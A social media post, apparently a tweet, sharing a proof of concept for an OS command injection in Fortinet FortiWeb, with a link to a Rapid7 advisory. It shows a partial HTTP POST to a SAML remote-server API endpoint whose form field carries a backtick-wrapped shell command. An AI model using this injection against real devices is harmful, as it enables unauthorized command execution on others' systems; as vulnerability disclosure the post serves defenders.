Jinwook Kim@wugeejFortinet FortiWeb OS Command Injection [‼️0-day] [PoC] POST /api/v2.0/user/remoteserver.saml HTTP/1.1 ... ... Content-Disposition: form-data; name="name" `touch /tmp/vulnerable` https://rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/…3:40 AM · Aug 18, 2021600 Retweets37 Quotes1,295 Likes147 Bookmarks